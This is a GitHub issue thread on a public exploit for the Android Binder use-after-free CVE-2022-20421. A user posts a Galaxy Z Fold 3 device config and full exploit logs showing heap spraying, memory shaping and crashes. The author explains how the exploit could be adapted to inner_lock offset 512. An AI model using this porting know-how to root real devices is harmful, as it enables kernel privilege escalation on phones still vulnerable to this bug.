0xkol / badspin

Bad Spin: Android Binder Privilege Escalation Exploit (CVE-2022-20421)
MIT License
226 stars 32 forks

Support Inner_Lock offset 512 #6

Closed diabl0w closed 1 year ago

diabl0w commented 1 year ago

I am trying the exploit on Galaxy Z Fold 3.

In the research paper, it is stated:

For the rest of the exploit we will use the dup2() function to reach this allocation. Using this method we can support inner_lock offsets ≥ 512. This is acceptable for us, as we did not encounter a smaller offset. Otherwise, we would have used the fork() method.

I am getting the following error:

[x] Found binder_proc's inner_lock offset: 512 (vuln_fd 64)

[x] Unsupported inner_lock offset: Must be >= 520 and aligned to 8.
[x] Exit.
diabl0w commented 1 year ago
device_configs[] = {
    {
        /* RP1A.200720.012.F926USQU1AUG8 */
        .name = "Galaxy Z Fold 3",
        .model = "SM-F926U",
        .android_version = 11,
        .android_security_patch.year = 2021,
        .android_security_patch.month = 7,
        .kernel_version = KERNEL_VERSION(5, 4, 61),
        .ram_offset = 0x28000000UL,
        .kimg_to_lm = samsung_kimg_to_lm,
        .find_kbase = scan_kbase,
    }
};

Attempting to override the inner_lock offset check results in the device crashing. The code always crashes on the first iteration, whether I use a ram_offset of 0x28000000UL or 0x0:

==========================================
Bad Spin Exploit (CVE-2022-20421) by 0xkol
==========================================
[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[17282:17282] New binder client: A
[17284:17284] New binder client: C
[17283:17283] New binder client: B
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
Txn size: 1023.562500KB
C: Wait for A...
B: Searching for magic badcab1ebadcab1e....
B: Destroying
B: Finish. 
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
***CRASH***

I am using the Galaxy Z Fold 3, but the ram_offset was taken from one of the default configs already provided in the code, for the Samsung Galaxy S22 (0x28000000UL). I downloaded the firmware for that device and double-checked using unmkbootimg, but unmkbootimg gave me an output of 0x20000000, so I'm not sure how the default configuration arrived at its value. I checked my own device's boot.img and got the same output of 0x20000000. Out of curiosity, I tried setting the ram offset to 0x02000000 for libbadspin (although I'm not sure it was correct to do that) and it did yield different output:

==========================================
Bad Spin Exploit (CVE-2022-20421) by 0xkol
==========================================
[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[18396:18396] New binder client: C
[18394:18394] New binder client: A
[18395:18395] New binder client: B
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Searching for magic badcab1ebadcab1e....
B: Destroying
B: Finish. 
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
    Testing ptmx 0 (fd 5)
        Reading ptmx 0
    Testing ptmx 1 (fd 6)
        Reading ptmx 1
    Testing ptmx 2 (fd 7)
        Reading ptmx 2
    Testing ptmx 3 (fd 8)
        Reading ptmx 3
    Freeing ptmx...
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
    Joining blocker threads...
    All blocker threads joined.
offsetof(inner_lock, binder_proc) = 512
[x] Found binder_proc's inner_lock offset: 512 (vuln_fd 64)

[graveyard_process] pid = 18455
[pipe_process:18456] Pinned to CPU 0
[pipe_process:18457] Pinned to CPU 1
[pipe_process:18458] Pinned to CPU 2
[pipe_process:18460] Pinned to CPU 4
[pipe_process:18459] Pinned to CPU 3
[pipe_process:18462] Pinned to CPU 6
[pipe_process:18461] Pinned to CPU 5
[pipe_process:18463] Pinned to CPU 7
[fd_master_process] pid = 18466
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:18524] 30000 files sprayed
[shaper_process:18520] 30000 files sprayed
[shaper_process:18523] 30000 files sprayed
[shaper_process:18521] 30000 files sprayed
[shaper_process:18522] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=18526
[timer_master_process] Wait for C to enter spin_lock()
[18527:18527] New binder client: A
[18528:18528] New binder client: B
[18529:18529] New binder client: C
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish. 
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[timer_master_process] Done
***CRASH***
0xkol commented 1 year ago

Hey, in practice it is possible to support an offset of 512. However, the exploit currently enters spin_lock() after the memory location has already been freed, and in my experiments, at offset 512 there is a garbage value (not 0x00000041), hence the crash. To adapt the exploit to offset 512 you would need to enter spin_lock() while the memory is allocated as a tty write buffer and then play with the timer threads. I did not pursue this in the current exploit.

diabl0w commented 1 year ago


Thank you for the response. I suppose I will close this, as I am certainly not skilled enough to adapt the exploit myself. I am still struggling even to determine the proper ramdisk_offset. I may revisit this another time, or try a firmware change and see whether that gets me a supported inner_lock offset.

diabl0w commented 1 year ago


Do you know how I can obtain the ramdisk_offset value without permission to read /proc/iomem?